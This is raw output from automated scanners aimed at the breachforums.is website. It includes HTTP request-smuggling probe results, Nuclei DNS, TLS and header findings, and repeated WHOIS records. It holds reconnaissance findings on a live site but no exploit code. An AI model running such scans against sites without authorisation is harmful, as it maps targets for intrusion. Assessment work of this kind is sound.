[endspacex-20] : OK (TECL: 0.19 - 400) (CLTE: 0.17 - 400)                                           
[rxprespace-20]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-20]: OK (TECL: 0.18 - 400) (CLTE: 0.20 - 400)                                           
[endspacerx-20]: OK (TECL: 0.26 - 400) (CLTE: 0.33 - 400)                                           
[endspacexn-20]: OK (TECL: 0.28 - 400) (CLTE: 0.19 - 400)                                           
[midspace-7f]  : OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[postspace-7f] : OK (TECL: 0.21 - 400) (CLTE: 0.19 - 400)                                           
[prespace-7f]  : OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[endspace-7f]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-7f] : OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-7f] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-7f]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-7f]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-7f]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-7f]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[midspace-a0]  : OK (TECL: 0.19 - 400) (CLTE: 0.24 - 400)                                           
[postspace-a0] : OK (TECL: 0.22 - 400) (CLTE: 0.18 - 400)                                           
[prespace-a0]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspace-a0]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-a0] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-a0] : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[rxprespace-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-a0]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-a0]: OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[midspace-ff]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-ff] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-ff]  : OK (TECL: 0.21 - 400) (CLTE: 0.17 - 400)                                           
[endspace-ff]  : OK (TECL: 0.21 - 400) (CLTE: 0.28 - 400)                                           
[xprespace-ff] : OK (TECL: 0.26 - 400) (CLTE: 0.26 - 400)                                           
[endspacex-ff] : OK (TECL: 0.24 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-ff]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-ff]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-ff]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-ff]: OK (TECL: 0.18 - 400) (CLTE: 0.20 - 400)                                           
====================================================================================•x[2023-09-17](21:24)x•
 RUNNING NUCLEI SCAN 
====================================================================================•x[2023-09-17](21:24)x•
[dns-saas-service-detection:cloudflare-cdn] [dns] [info] breachforums.is
[nameserver-fingerprint] [dns] [info] breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]
[txt-fingerprint] [dns] [info] breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                                                                         
[dmarc-detect] [dns] [info] _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]
[mx-fingerprint] [dns] [info] breachforums.is [10 mail.breachforums.is.]
[dns-waf-detect:cloudflare] [dns] [info] breachforums.is
[google-floc-disabled] [http] [info] https://breachforums.is:8443
[tech-detect:cloudflare] [http] [info] https://breachforums.is:8443
[http-missing-security-headers:strict-transport-security] [http] [info] https://breachforums.is:8443
[http-missing-security-headers:content-security-policy] [http] [info] https://breachforums.is:8443
[http-missing-security-headers:x-content-type-options] [http] [info] https://breachforums.is:8443
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] https://breachforums.is:8443
[http-missing-security-headers:clear-site-data] [http] [info] https://breachforums.is:8443
[rdap-whois:raw] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted rights.\nExcept for agreed Internet operational purposes, no part of this publication may be reproduced, stored \nin a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, recording, or \notherwise, without prior permission from ISNIC. Any use of this material to target advertising or similar \nactivities is explicitly forbidden and will be prosecuted. ISNIC requests to be notified of any such \nactivities or suspicions thereof."],"links":[{"href":"https://www.isnic.is/en/about/copyright","rel":"self","type":"text/html","value":"https://www.isnic.is/en/about/copyright"}],"title":"Copyright ©2023"},{"description":["23.162.0.39/32","2023-09-18 04:25:12.829362+00"],"title":"client info"}],"objectClassName":"domain","rdapConformance":["rdap_level_0","isnic_level_0"],"secureDNS":{"delegationSigned":false},"status":["active"],"unicodeName":"breachforums.is"}]                                                       
[rdap-whois:email] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                                                                                                               
[rdap-whois:secureDNS] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [false]
[waf-detect:cloudflare] [http] [info] https://breachforums.is:8443/
[ssl-issuer] [ssl] [info] breachforums.is:8443 [Google Trust Services LLC]
[ssl-dns-names] [ssl] [info] breachforums.is:8443 [breachforums.is,*.breachforums.is]
[tls-version] [ssl] [info] breachforums.is:8443 [tls10]
[tls-version] [ssl] [info] breachforums.is:8443 [tls12]
====================================================================================•x[2023-09-17](21:28)x•
 RUNNING SC0PE WEB VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](21:28)x•
P5 - INFO, Server Header Disclosure - HTTPS, https://breachforums.is:8443//, server: cloudflare
P4 - LOW, Strict Tranposrt Security Not Enforced, https://breachforums.is:8443//, 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:8443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:8443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:8443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
